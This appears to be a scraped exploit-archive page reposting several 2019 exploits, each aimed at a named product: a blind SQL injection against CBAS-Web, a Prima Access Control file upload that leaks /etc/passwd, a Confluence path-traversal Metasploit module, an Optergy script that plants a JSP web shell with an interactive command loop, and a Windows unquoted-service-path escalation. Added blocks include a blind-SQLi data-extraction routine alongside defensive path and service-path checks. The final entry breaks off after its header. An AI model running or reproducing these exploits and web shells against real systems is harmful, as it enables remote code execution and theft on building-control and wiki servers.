All posts by ISHACK AI BOT

  1. # Exploit Title: CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection
     # Google Dork: NA
     # Date: 2019-11-11
     # Exploit Author: LiquidWorm
     # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
     # Software Link: https://www.computrols.com/building-automation-software/
     # Version: 19.0.0
     # Tested on: NA
     # CVE : N/A
     # Advisory: https://applied-risk.com/resources/ar-2019-009
     # Paper: https://applied-risk.com/resources/i-own-your-building-management-system

     # Computrols CBAS-Web Authenticated Boolean-based Blind SQL Injection
     # PoC (id param):

     http://192.168.1.250/cbas/index.php?m=servers&a=start_pulling&id=1 AND 2510=2510
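The `id` parameter above is reported as a boolean-based blind injection: the response never shows query output, only whether the injected condition held (`1 AND 2510=2510` behaves like `id=1`, a false condition behaves like a missing row). The block below is an added example, not part of the post and not Computrols code. It models such an endpoint over an in-memory SQLite table with constructed rows, shows the hardened parameterised version beside it, and then recovers a value one character at a time from nothing but the true/false oracle, which is what a tool such as sqlmap automates. The table names, columns and row contents are assumptions; `start_pulling` is only a stand-in for the real `m=servers&a=start_pulling` handler.

```python
import sqlite3

# Constructed data standing in for the application's tables (assumption, not the real schema).
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE servers (id INTEGER PRIMARY KEY, name TEXT);
INSERT INTO servers VALUES (1, 'bms-core');
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'Winter2019!');
""")


def start_pulling(id_param: str) -> bool:
    """Model of the vulnerable handler: the raw 'id' value is concatenated into SQL.
    The caller only learns whether a row matched, which is the blind condition."""
    sql = "SELECT name FROM servers WHERE id=" + id_param  # vulnerable: string concatenation
    return conn.execute(sql).fetchone() is not None


def start_pulling_safe(id_param: str) -> bool:
    """Hardened counterpart: the value is bound, so '1 AND 2510=2510' is a single
    non-numeric value that matches no row instead of becoming a boolean tail."""
    row = conn.execute("SELECT name FROM servers WHERE id=?", (id_param,)).fetchone()
    return row is not None


def oracle(condition: str) -> bool:
    """True iff `condition` is true when evaluated against the row with id=1."""
    return start_pulling("1 AND (" + condition + ")")


def extract_string(subquery: str, max_len: int = 64) -> str:
    """Recover the scalar result of `subquery` byte by byte with a binary search over
    the character code (about 7 yes/no queries per byte)."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # unicode() of '' (past the end of the string) is NULL, so every
            # comparison is false and the search converges on 0.
            if oracle("unicode(substr((%s),%d,1)) > %d" % (subquery, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    print("PoC condition true :", start_pulling("1 AND 2510=2510"))
    print("PoC condition false:", start_pulling("1 AND 2510=2511"))
    print("parameterised query:", start_pulling_safe("1 AND 2510=2510"))
    print("extracted:", extract_string("SELECT password FROM users WHERE username='admin'"))
```

The PoC's `2510=2510` is exactly the `oracle()` call with a tautology; swapping the tautology for a comparison on a `substr()` of any subquery turns the yes/no answer into a data channel. The parameterised handler defeats it because the whole string is bound as one value.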
  2. # Exploit Title: Prima Access Control 2.3.35 - Arbitrary File Upload
     # Google Dork: NA
     # Date: 2019-11-11
     # Exploit Author: LiquidWorm
     # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
     # Software Link: https://www.computrols.com/building-automation-software/
     # Version: 2.3.35
     # Tested on: NA
     # CVE : CVE-2019-9189
     # Advisory: https://applied-risk.com/resources/ar-2019-007
     # Paper: https://applied-risk.com/resources/i-own-your-building-management-system

     # Prima Access Control 2.3.35 Authenticated Stored XSS
     # PoC
     ---

     POST /bin/sysfcgi.fx HTTP/1.1
     Host: 192.168.13.37
     Connection: keep-alive
     Content-Length: 572
     Origin: https://192.168.13.37
     Session-ID: 5682699
     User-Agent: Mozi-Mozi/44.0
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     Accept: text/html, */*; q=0.01
     Session-Pc: 2
     X-Requested-With: XMLHttpRequest
     Referer: https://192.168.13.37/app/
     Accept-Encoding: gzip, deflate, br
     Accept-Language: en-US,en;q=0.9
     Cookie: G_ENABLED_IDPS=google

     <requests><request name="PythonScriptUpload"><param name="DestinationHwID" value="1"/><param name="FileName" value="test_python.py"/><param name="Content" value="#!/usr/bin/python&#xA;#&#xA;# test script&#xA;#&#xA;&#xA;import sys,os&#xA;&#xA;with open("/etc/passwd") as f:&#xA; with open("/www/pages/app/images/logos/testingus2.txt", "w") as f1:&#xA; for line in f:&#xA; f1.write(line)&#xA;&#xA;&#xA;os.system("id;uname -a >> /www/pages/app/images/logos/testingus2.txt")"/></request></requests>

     Result:

     $ curl https://192.168.13.37/app/images/logos/testingus2.txt
     root:x:0:0:root:/home/root:/bin/sh
     daemon:x:1:1:daemon:/usr/sbin:/bin/false
     bin:x:2:2:bin:/bin:/bin/false
     sys:x:3:3:sys:/dev:/bin/false
     sync:x:4:100:sync:/bin:/bin/sync
     mail:x:8:8:mail:/var/spool/mail:/bin/false
     www-data:x:33:33:www-data:/var/www:/bin/false
     operator:x:37:37:Operator:/var:/bin/false
     nobody:x:99:99:nobody:/home:/bin/false
     python:x:1000:1000:python:/home/python:/bin/false
     admin:x:1001:1001:Linux User,,,:/home/admin:/bin/sh
     uid=0(root) gid=0(root) groups=0(root),10(wheel)
     Linux DemoMaster214 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux
  3. # Exploit Title: Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)
     # Google Dork: N/A
     # Date: 2019-11-11
     # Exploit Author: max7253
     # Vendor Homepage: https://www.atlassian.com
     # Software Link: https://www.atlassian.com/software/confluence/download-archives
     # Version: 6.15.1
     # Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, Linux 5.0.0-23-generic #24~18.04.1-Ubuntu
     # CVE : N/A

     ##
     # This module requires Metasploit: https://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     class MetasploitModule < Msf::Exploit::Remote
       Rank = ExcellentRanking

       include Msf::Exploit::Remote::HttpClient

       def initialize(info={})
         super(update_info(info,
           'Name'           => "Confluence Arbitrary File Write via Path Traversal (CVE-2019-3398)",
           'Description'    => %q{
             To use this exploit you should specify the following variables:

             USERNAME and PASSWORD - the login/password to log into the web interface of the
             Atlassian Confluence server.

             ROOTFOLDER - the root directory of the web server. If the root directory is located in
             C:\confluence\pages\, set this variable to ROOTFOLDER = 'confluence/pages/'.
             Typical ROOTFOLDER locations are:
               Windows: Program Files/Atlassian/Confluence/confluence/pages/
               Linux:   opt/atlassian/confluence/confluence/pages/
             Note that the root directory of the web server and the temporary directory of the
             Atlassian Confluence server on Windows must be on the same drive (C:\ in the example above).

             PAGEID - the pageId URL parameter you see in the browser address bar when you visit the
             Atlassian Confluence page where you have rights to upload files. For example,
             https://server.net/pages/viewpageattachments.action?pageId=111111111&metadataLink=true.
             If PAGEID is set to 0, the script will try to create a new Page ID. If it fails, it will
             try to create a new space and create a Page ID there. If PAGEID is not specified, the
             script will walk through the PAGEID_RANGE_START..PAGEID_RANGE_END range.

             The script gets authenticated to the Atlassian Confluence server, retrieves the
             ATLASSIAN TOKEN from the server response, uploads the shellcode, then imitates the
             'Download all' action to place the shellcode in the root directory of the web server.

             Tested on Atlassian v6.15.1 on Linux and Windows.

             Note that on Linux Confluence runs under the 'confluence' account, which may not have
             rights to save files in the root directory of the web server. In this case the exploit
             will fail.

             Also, to create a new space and get the list of existing spaces the script makes use of
             the Confluence REST API, which is available starting from Confluence Server 5.5.
           },
           'License'        => MSF_LICENSE,
           'Author'         =>
             [
               'Maxim Guslyaev' # Metasploit module
             ],
           'References'     =>
             [
               [ 'CVE', '2019-3398' ],
               [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-04-17-968660855.html' ],
               [ 'URL', 'https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181' ],
               [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-3398' ]
             ],
           'Privileged'     => false,
           'Platform'       => %w{ linux win },
           'Targets'        =>
             [
               [ 'Windows', { 'Platform' => 'win',   'Arch' => ARCH_JAVA } ],
               [ 'Linux',   { 'Platform' => 'linux', 'Arch' => ARCH_JAVA } ]
             ],
           'DefaultOptions' => { 'RPORT' => 8090, 'SSL' => false },
           'DisclosureDate' => 'Nov 9 2019',
           'DefaultTarget'  => 0
         ))

         register_options(
           [
             OptString.new('USERNAME', [true, 'The login to log into the web interface of the Atlassian Confluence server', 'test']),
             OptString.new('PASSWORD', [true, 'The password to log into the web interface of the Atlassian Confluence server', 'test']),
             OptString.new('ROOTFOLDER', [true, 'The root folder of the Atlassian Confluence server', 'Program Files/Atlassian/Confluence/confluence/pages/']),
             #OptString.new('ROOTFOLDER', [true, 'The root folder of the Atlassian Confluence server', 'opt/atlassian/confluence/confluence/pages/']),
             OptString.new('FILENAME', [true, 'The JSP shellcode file name', 'covfefe.jsp']),
             OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),
             OptString.new('NEWSPACE', [false, 'A new space to be created', 'TESTSPACE432545645']),
             OptInt.new('PAGEID', [false, 'A Page ID to be used to upload shellcode', 0]),
             OptInt.new('PAGEID_RANGE_START', [false, 'The first Page ID to be used to enumerate a writable Page ID (used when PAGEID is not specified)', '1']),
             OptInt.new('PAGEID_RANGE_END', [false, 'The last Page ID to be used to enumerate a writable Page ID (used when PAGEID is not specified)', '999999999']),
           ], self.class)
       end

       def do_authenticate
         print_status("Sending POST request to the web application (authentication)...")
         res = send_request_cgi({
           'uri'       => normalize_uri(target_uri.path.to_s, '/dologin.action'),
           'method'    => 'POST',
           'vars_post' => {
             'os_username'    => datastore['USERNAME'],
             'os_password'    => datastore['PASSWORD'],
             'os_destination' => '',
             'login'          => 'Log+In'
           }
         })

         if res.nil?
           print_status("Unable to access the web application!")
           return 0
         end

         # get_sid returns '' (not nil) when no JSESSIONID cookie was issued, so test for blank
         @sessid = get_sid(res)
         if @sessid.blank?
           print_status("Unable to retrieve session ID!")
           return 0
         end
         print_status("Getting Session ID from the web application... #{@sessid}")

         if res && res.redirect?
           location = res.redirection
           if location.nil?
             print_status("Unable to access the web application when redirected!")
             return 0
           end
           # positional arguments of send_request_cgi! are (opts, timeout, redirect_depth)
           res = send_request_cgi!({
             'uri'     => normalize_uri(target_uri.path.to_s, location.to_s),
             'method'  => 'GET',
             'headers' => { 'Cookie' => @sessid }
           }, 20, 5)
         end

         if res && res.code == 200
           if res.body =~ /re-enter\syour\slogin/ ||
              res.body =~ /Sorry,\syour\susername\sand\/or\spassword\sare\sincorrect/ ||
              res.body =~ /Unauthorized/
             print_status("Authentication failed...")
             return 0
           end
           @xsrf_token = res.get_html_document.at('meta[@id="atlassian-token"]')['content']
           if @xsrf_token.nil? or @xsrf_token.blank?
             print_status("Failed to retrieve XSRF token...")
             return 0
           else
             print_status("Retrieving XSRF token... #{@xsrf_token}")
             return 1
           end
         else
           print_status("Unexpected response from the web application...")
           return 0
         end
       end

       def do_upload(_pageid)
         print_status("Sending POST request to the web application (shellcode upload)...")
         res = send_request_cgi({
           'uri'      => normalize_uri(target_uri.path.to_s, '/plugins/drag-and-drop/upload.action'),
           'method'   => 'POST',
           'vars_get' => {
             'pageId'    => _pageid,
             # the traversal: the attachment name walks up out of the attachments directory into ROOTFOLDER
             'filename'  => '../../../../../../../../../../' + datastore['ROOTFOLDER'] + datastore['FILENAME'],
             'size'      => payload.encoded.length,
             'mimeType'  => 'text/plain',
             'spaceKey'  => 'isis',
             'atl_token' => @xsrf_token,
             'name'      => datastore['FILENAME']
           },
           'data'     => payload.encoded,
           'headers'  => {
             'Connection'      => 'close',
             'Accept'          => '*/*',
             'Accept-Encoding' => 'identity',
             'Cookie'          => @sessid,
             'Content-Length'  => payload.encoded.length,
             'Content-Type'    => 'text/plain'
           }
         })

         if res && res.code == 200 && res.body.scan(/actionErrors/).blank?
           print_status("Shellcode uploaded...")
           return 1
         else
           return 0
         end
       end

       def do_downloadall(_pageid)
         for downloadall_iter in 1..10
           print_status("Sending GET request to the web application (downloadall)...")
           res = send_request_cgi({
             'uri'      => normalize_uri(target_uri.path.to_s, '/pages/downloadallattachments.action'),
             'method'   => 'GET',
             'vars_get' => { 'pageId' => _pageid },
             'headers'  => { 'Cookie' => @sessid }
           })

           print_status("Sending GET request to the web application (shellcode invocation)...")
           res = send_request_cgi({
             'uri'     => normalize_uri(target_uri.path.to_s, '/pages/' + datastore['FILENAME']),
             'method'  => 'GET',
             'headers' => { 'Cookie' => @sessid }
           }, 10) # timeout in seconds

           if res && res.code == 200
             print_status("Shellcode found...")
             return 1
           else
             if downloadall_iter == 10
               print_status("Shellcode not found...")
               return 0
             end
           end
         end
       end

       def do_getspaces
         print_status("Sending GET request to the web application (getting available spaces)...")
         res = send_request_cgi({
           'uri'     => normalize_uri(target_uri.path.to_s, '/rest/api/space'),
           'method'  => 'GET',
           'headers' => {
             'User-Agent'      => 'python-requests/2.20.0',
             'Cookie'          => @sessid,
             'Accept'          => '*/*',
             'Accept-Encoding' => 'identity',
             'Content-Type'    => 'application/json'
           }
         })

         if res && res.code == 200 && res.body =~ /results/
           space_list = res.body.scan(/\"key\":\"(\w+)\"/).flatten
         else
           space_list = Array([])
         end
         return space_list
       end

       def do_createspace
         print_status("Sending POST request to the web application (creating a space)...")
         res = send_request_cgi({
           'uri'     => normalize_uri(target_uri.path.to_s, '/rest/api/space'),
           'method'  => 'POST',
           'data'    => {
             "key": datastore['NEWSPACE'],
             "name": "Example space",
             "description": {
               "plain": {
                 "value": "This is an example space",
                 "representation": "plain"
               }
             },
             "metadata": {}
           }.to_json,
           'headers' => {
             'User-Agent'      => 'python-requests/2.20.0',
             'Cookie'          => @sessid,
             'Accept-Encoding' => 'identity',
             'Content-Type'    => 'application/json'
           }
         })

         if res && res.code == 200 && res.body =~ /\"key\":\"\w+\"/
           print_status("Space created...")
           return res.body.scan(/\"key\":\"(\w+)\"/).flatten[0]
         else
           print_status("Space not created...")
           return 0
         end
       end

       def do_createpage(_space)
         print_status("Sending GET request to the web application (creating Page ID), space #{_space}...")
         res = send_request_cgi({
           'uri'     => normalize_uri(target_uri.path.to_s, '/pages/createpage.action?spaceKey=' + _space),
           'method'  => 'GET',
           'headers' => { 'Cookie' => @sessid }
         })

         if res && res.code == 200 && res.body =~ /ajs-draft-id/
           pageid = res.get_html_document.at('meta[@name="ajs-draft-id"]')['content']
           pageid_parsed = /(\d+)/.match(pageid)
           if pageid_parsed.nil?
             print_status("Unexpected Page ID format...")
             return 0
           else
             print_status("Page ID created... #{pageid}")
             datastore['PAGEID'] = pageid
             return 1
           end
         else
           return 0
         end
       end

       def get_sid(res)
         if res.nil?
           return ''
         end
         res.get_cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || ''
       end

       def exploit
         print_status("Getting authenticated to the web application...")
         if do_authenticate != 1
           fail_with(Failure::Unknown, 'Initial access or authentication error!')
         end

         unless datastore['PAGEID'].blank?
           if datastore['PAGEID'] == 0
             print_status("Creating Page ID...")
             spaces = do_getspaces
             for sp in spaces
               if do_createpage(sp) == 1
                 print_status("Uploading shellcode...")
                 if do_upload(datastore['PAGEID']) != 1
                   print_status("Failed to upload shellcode...")
                   next
                 end
                 print_status("Invoking shellcode...")
                 if do_downloadall(datastore['PAGEID']) != 1
                   print_status("Failed to invoke shellcode...")
                   next
                 else
                   return
                 end
               end
             end

             print_status("Trying to create a new space...")
             new_sp = do_createspace
             if new_sp != 0
               if do_createpage(new_sp) == 1
                 print_status("Uploading shellcode...")
                 if do_upload(datastore['PAGEID']) != 1
                   fail_with(Failure::Unknown, 'Error while uploading shellcode!')
                 end
                 print_status("Invoking shellcode...")
                 if do_downloadall(datastore['PAGEID']) != 1
                   fail_with(Failure::Unknown, 'Error while invoking shellcode!')
                 end
                 return
               else
                 fail_with(Failure::Unknown, 'Error while creating page in the newly created space!')
               end
             else
               fail_with(Failure::Unknown, 'Error while creating space!')
             end
           end

           print_status("Uploading shellcode...")
           if do_upload(datastore['PAGEID']) != 1
             fail_with(Failure::Unknown, 'Error while uploading shellcode!')
           end
           print_status("Invoking shellcode...")
           if do_downloadall(datastore['PAGEID']) != 1
             fail_with(Failure::Unknown, 'Error while invoking shellcode!')
           end
         else
           for id in datastore['PAGEID_RANGE_START']..datastore['PAGEID_RANGE_END']
             print_status("Trying Page Id #{id}")
             print_status("Uploading shellcode...")
             if do_upload(id) == 1
               print_status("Invoking shellcode...")
               if do_downloadall(id) == 1
                 break
               end
             end
           end
         end
       end

       def check
         # positional arguments of send_request_cgi! are (opts, timeout, redirect_depth)
         res = send_request_cgi!({
           'uri'    => normalize_uri(target_uri.path.to_s, '/login.action?anon=1&logout=1'),
           'method' => 'GET',
         }, 20, 5)

         if res && res.body =~ /Powered\sby/
           ver = res.body.scan(/^.*Powered\sby\s.*(\d{1,}\.\d{1,}\.\d{1,}).*$/).flatten[0]
           print_status("The version of the web application is #{ver}")
           ver_parsed = /(\d+)\.(\d+)\.(\d+)/.match(ver.to_s)
           if ver_parsed.nil?
             print_status("The version of the web application couldn't be parsed")
             return Exploit::CheckCode::Detected
           end
           ver_oct1 = ver_parsed[1].to_i
           ver_oct2 = ver_parsed[2].to_i
           ver_oct3 = ver_parsed[3].to_i
           if ver_oct1.between?(2, 6) && ver_oct2.between?(0, 6) && ver_oct3.between?(0, 12) ||
              ver_oct1.between?(6, 6) && ver_oct2.between?(7, 12) && ver_oct3.between?(0, 3) ||
              ver_oct1.between?(6, 6) && ver_oct2.between?(13, 13) && ver_oct3.between?(0, 3) ||
              ver_oct1.between?(6, 6) && ver_oct2.between?(14, 14) && ver_oct3.between?(0, 2) ||
              ver_oct1.between?(6, 6) && ver_oct2.between?(15, 15) && ver_oct3.between?(0, 1)
             return Exploit::CheckCode::Appears
           else
             return Exploit::CheckCode::Safe
           end
         else
           return Exploit::CheckCode::Unknown
         end
       end
     end
  4. # Title: Optergy 2.3.0a - Remote Code Execution
     # Author: LiquidWorm
     # Date: 2019-11-05
     # Vendor: https://optergy.com/
     # Product web page: https://optergy.com/products/
     # Affected version: <=2.3.0a
     # Advisory: https://applied-risk.com/resources/ar-2019-008
     # Paper: https://applied-risk.com/resources/i-own-your-building-management-system
     # CVE: CVE-2019-7274

     #!/usr/bin/env python
     # -*- coding: utf8 -*-
     #
     ##########################################################################
     #
     # lqwrm@metalgear:~/stuff/optergy$ python optergy_rfm.py
     # [+] Usage: optergy_rfm.py http://IP
     # [+] Example: optergy_rfm.py http://10.0.0.17
     #
     # lqwrm@metalgear:~/stuff/optergy$ python optergy_rfm.py http://192.168.232.19
     # Enter username: podroom
     # Enter password: podroom
     #
     # Welcome to Optergy HTTP Shell!
     # You can navigate to: http://192.168.232.19/images/jox.jsp
     # Or you can continue using this 'shell'.
     # Type 'exit' for exit.
     #
     # root@192.168.232.19:~# id
     # uid=1000(optergy) gid=1000(optergy) groups=1000(optergy),4(adm)
     # root@192.168.232.19:~# sudo id
     # uid=0(root) gid=0(root) groups=0(root)
     # root@192.168.232.19:~# rm /usr/local/tomcat/webapps/ROOT/images/jox.jsp
     #
     # root@192.168.232.19:~# exit
     # Have a nice day!
     #
     ##########################################################################

     import requests
     import sys, os, time, re

     piton = os.path.basename(sys.argv[0])

     if len(sys.argv) < 2:
         print "[+] Usage: " + piton + " http://IP"
         print "[+] Example: " + piton + " http://10.0.0.17\n"
         sys.exit()

     the_user = raw_input("Enter username: ")
     the_pass = raw_input("Enter password: ")
     the_host = sys.argv[1]

     odi = requests.Session()

     # Authenticate; the session object keeps the cookie for the upload request
     the_url = the_host + "/ajax/AjaxLogin.html?login"
     the_headers = {"Accept"           : "*/*",
                    "X-Requested-With" : "XMLHttpRequest",
                    "User-Agent"       : "Noproblem/16.0",
                    "Content-Type"     : "application/x-www-form-urlencoded",
                    "Accept-Encoding"  : "gzip, deflate",
                    "Accept-Language"  : "en-US,en;q=0.9"}
     the_data = {"username" : the_user,
                 "password" : the_pass,
                 "token"    : ''}
     odi.post(the_url, headers = the_headers, data = the_data)

     # FileUploader.html writes the uploaded file wherever the caller-supplied
     # outputLocation points; here that is the Tomcat ROOT webapp's images directory.
     # (String decoded from the hex-escaped form in the original script.)
     the_upl = ("/ajax/FileUploader.html?idToUse=attachment-1546002369939&decompress=false"
                "&outputLocation=%2Fusr%2Flocal%2Ftomcat%2Fwebapps%2FROOT%2Fimages%2F"
                "&fileName=jox.jsp")
     the_url = the_host + the_upl
     the_headers = {"Cache-Control"   : "max-age=0",
                    "Content-Type"    : "multipart/form-data; boundary=----WebKitFormBoundarysrMvKmQPYUODSWBl",
                    "User-Agent"      : "Noproblem/16.0",
                    "Accept"          : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
                    "Accept-Encoding" : "gzip, deflate",
                    "Accept-Language" : "en-US,en;q=0.9"}

     # JSP command shell carried in the multipart body (decoded from the hex-escaped form)
     jsp_shell = (
         '<%@ page import="java.util.*,java.io.*"%>\n'
         '<HTML><BODY>\n'
         '<FORM METHOD="GET" NAME="myform" ACTION="">\n'
         '<INPUT TYPE="text" NAME="cmd">\n'
         '<INPUT TYPE="submit" VALUE="Send">\n'
         '</FORM>\n'
         '<pre>\n'
         '<%\n'
         'if (request.getParameter("cmd") != null) {\n'
         '        out.println("Command: " + request.getParameter("cmd") + "<BR>");\n'
         '        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));\n'
         '        OutputStream os = p.getOutputStream();\n'
         '        InputStream in = p.getInputStream();\n'
         '        DataInputStream dis = new DataInputStream(in);\n'
         '        String disr = dis.readLine();\n'
         '        while ( disr != null ) {\n'
         '                out.println(disr); \n'
         '                disr = dis.readLine(); \n'
         '                }\n'
         '        }\n'
         '%>\n'
         '</pre>\n'
         '</BODY></HTML>\n\n\n'
     )
     the_data = (
         "------WebKitFormBoundarysrMvKmQPYUODSWBl\r\n"
         'Content-Disposition: form-data; name="attachment-1546002369939"; filename="jox.jsp"\r\n'
         "Content-Type: application/octet-stream\r\n"
         "\r\n"
         + jsp_shell +
         "\r\n------WebKitFormBoundarysrMvKmQPYUODSWBl\r\n"
         'Content-Disposition: form-data; name="upload"\r\n'
         "\r\n"
         "Upload\r\n"
         "------WebKitFormBoundarysrMvKmQPYUODSWBl--\r\n"
     )
     odi.post(the_url, headers = the_headers, data = the_data)

     print "\nWelcome to Optergy HTTP Shell!"
     print "You can navigate to: " + the_host + "/images/jox.jsp"
     print "Or you can continue using this 'shell'."
     print "Type 'exit' for exit.\n"

     while True:
         try:
             cmd = raw_input("root@" + the_host[7:] + ":~# ")
             if cmd.strip() == "exit":
                 print "Have a nice day!"
                 break
             paramz = {"cmd" : cmd} # sudo cmd
             shell = requests.get(url = the_host + "/images/jox.jsp", params = paramz)
             regex = re.search(r"BR>(.*?)</pre>", shell.text, flags = re.S)
             print regex.group(1).strip()
         except Exception:
             break

     sys.exit()
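Two of the uploads above succeed for the same reason: the Confluence module sends `../../../../../../../../../../<ROOTFOLDER><FILENAME>` as the attachment `filename`, and the Optergy script's upload URL carries an attacker-chosen `outputLocation` of `/usr/local/tomcat/webapps/ROOT/images/`; in both cases the server joins caller-controlled path material onto its storage directory and never checks where the result landed. The block below is an added example, not code from Atlassian, Optergy, or either post, of the confinement check an upload handler needs: resolve the final path and refuse anything outside the attachment root. The root directory and the sample names are assumptions; the two constructed inputs mirror the two request shapes.

```python
import os
import tempfile


class PathEscapesRoot(ValueError):
    """Raised when a caller-supplied path would land outside the attachment root."""


def vulnerable_target(attach_root: str, client_path: str) -> str:
    """What the exploited handlers effectively do.  os.path.join drops attach_root
    entirely when client_path is absolute (the Optergy shape), and '..' segments are
    honoured (the Confluence shape), so both requests write outside the root."""
    return os.path.normpath(os.path.join(attach_root, client_path))


def safe_target(attach_root: str, client_path: str) -> str:
    """Confine the write: reject absolute client paths, resolve symlinks and '..' on
    both sides, and require the candidate to sit under the resolved root."""
    if os.path.isabs(client_path):
        raise PathEscapesRoot("absolute client path: %r" % client_path)
    root = os.path.realpath(attach_root)
    candidate = os.path.realpath(os.path.join(root, client_path))
    # commonpath, not a string prefix test: a prefix test accepts
    # /srv/attachments-evil when the root is /srv/attachments.
    if os.path.commonpath([root, candidate]) != root:
        raise PathEscapesRoot("traversal outside %s: %r" % (root, client_path))
    return candidate


def is_confined(attach_root: str, client_path: str) -> bool:
    """True if safe_target accepts client_path for attach_root."""
    try:
        safe_target(attach_root, client_path)
        return True
    except PathEscapesRoot:
        return False


# Constructed inputs modelled on the two exploits (the Linux ROOTFOLDER from the
# Confluence module's description, and the Optergy outputLocation plus fileName).
CONFLUENCE_FILENAME = "../../../../../../../../../../opt/atlassian/confluence/confluence/pages/covfefe.jsp"
OPTERGY_OUTPUT_LOCATION = "/usr/local/tomcat/webapps/ROOT/images/jox.jsp"
LEGIT_FILENAME = "2019/report.pdf"

if __name__ == "__main__":
    root = tempfile.mkdtemp(prefix="attachments-")
    for name in (CONFLUENCE_FILENAME, OPTERGY_OUTPUT_LOCATION, LEGIT_FILENAME):
        verdict = "accepted" if is_confined(root, name) else "REJECTED"
        print("vulnerable join ->", vulnerable_target(root, name))
        print("hardened check  ->", verdict, repr(name))
```

`realpath` before `commonpath` matters: a symlink inside the attachment directory pointing at the web root would otherwise pass a purely lexical check. Also note the Confluence module relies on a second step (`downloadallattachments.action`) to move the file; the check above stops the first step, after which there is nothing to move.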
  5. # Exploit Title: Alps Pointing-device Controller 8.1202.1711.04 - 'ApHidMonitorService' Unquoted Service Path
     # Date: 2019-11-12
     # Exploit Author: Mario Rodriguez
     # Vendor Homepage: https://www.alps.com/e/
     # Software Link: https://www.alps.com/e/
     # Version: 8.1202.1711.04
     # Tested on: Windows 10 Home x64 Spanish

     # The Alps Pointing-device controller installs a service with an unquoted path,
     # which can be used for local privilege escalation. To exploit this vulnerability,
     # an executable file could be placed in the path of the service and, after rebooting the system or
     # restarting the service, the malicious code will be executed with elevated privileges.

     # Steps to discover the vulnerability

     C:\Users\user>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
     Alps HID Monitor Service    ApHidMonitorService    C:\Program Files\Apoint2K\HidMonitorSvc.exe    Auto

     C:\Users\user>sc qc ApHidMonitorService
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: ApHidMonitorService
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files\Apoint2K\HidMonitorSvc.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : Alps HID Monitor Service
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem

     (The sc output above was produced on a Spanish-locale system; field labels are given in their English equivalents.)
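What makes the unquoted path exploitable is how Windows resolves it: with no quotes around `C:\Program Files\Apoint2K\HidMonitorSvc.exe`, process creation tries each prefix that ends at a space as a candidate executable (appending `.exe`), so `C:\Program.exe` is attempted before the real binary. The block below is an added example, not part of the post, that parses lines in the shape of the `wmic service get` output above (constructed sample lines, the Alps one taken from the post and the others invented for contrast) and lists, for every unquoted path containing a space, the files Windows would try first. That list is the practical check: a local user who can create any of those files gets code execution as the service account, which is `LocalSystem` here.

```python
import re

# Constructed sample in the shape of `wmic service get name,displayname,pathname,startmode`.
# The Alps row is from the post; the other rows are invented for contrast.
WMIC_SAMPLE = """\
DisplayName                     Name                  PathName                                                   StartMode
Alps HID Monitor Service        ApHidMonitorService   C:\\Program Files\\Apoint2K\\HidMonitorSvc.exe             Auto
Quoted Vendor Service           QuotedSvc             "C:\\Program Files\\Vendor Tools\\svc.exe" -run            Auto
Acme Updater                    AcmeUpd               C:\\Tools\\Acme Corp\\Updater Bin\\update.exe /service    Auto
No Space Service                NoSpaceSvc            C:\\Tools\\nospace\\svc.exe                               Manual
"""

# wmic separates columns with runs of two or more spaces; values themselves may hold single spaces.
_ROW = re.compile(r"^(?P<display>.+?)\s{2,}(?P<name>\S+)\s{2,}(?P<path>.+?)\s{2,}(?P<mode>\S+)\s*$")


def parse_wmic(text):
    """Yield (name, pathname, startmode) for each data row, skipping the header."""
    for line in text.splitlines()[1:]:
        m = _ROW.match(line)
        if m:
            yield m.group("name"), m.group("path"), m.group("mode")


def hijack_candidates(pathname):
    """Executables the loader would try before the intended image of an unquoted
    service path, in order.  Quoted paths and paths without spaces yield []."""
    if pathname.startswith('"'):
        return []
    # The image ends at the first whitespace-delimited token ending in .exe;
    # anything after it is arguments (e.g. '/service').
    m = re.match(r"(?i)^(.*?\.exe)(\s|$)", pathname)
    image = m.group(1) if m else pathname
    if " " not in image:
        return []
    parts = image.split(" ")
    # Each prefix that ends at a space is tried as '<prefix>.exe' before the real path.
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def find_unquoted(text):
    """Map service name -> candidate hijack paths for every vulnerable row."""
    findings = {}
    for name, path, _mode in parse_wmic(text):
        cands = hijack_candidates(path)
        if cands:
            findings[name] = cands
    return findings


if __name__ == "__main__":
    for svc, cands in find_unquoted(WMIC_SAMPLE).items():
        print(svc)
        for c in cands:
            print("   would try:", c)
```

The candidate list is also the remediation test: the issue is only exploitable if a non-administrator can create a file at one of those locations, so check the ACL of each parent directory (`C:\` for the Alps case) rather than only reporting the missing quotes.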
  6. # Title: Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin)
     # Author: LiquidWorm
     # Date: 2019-11-05
     # Vendor: https://optergy.com/
     # Product web page: https://optergy.com/products/
     # Affected version: <=2.3.0a
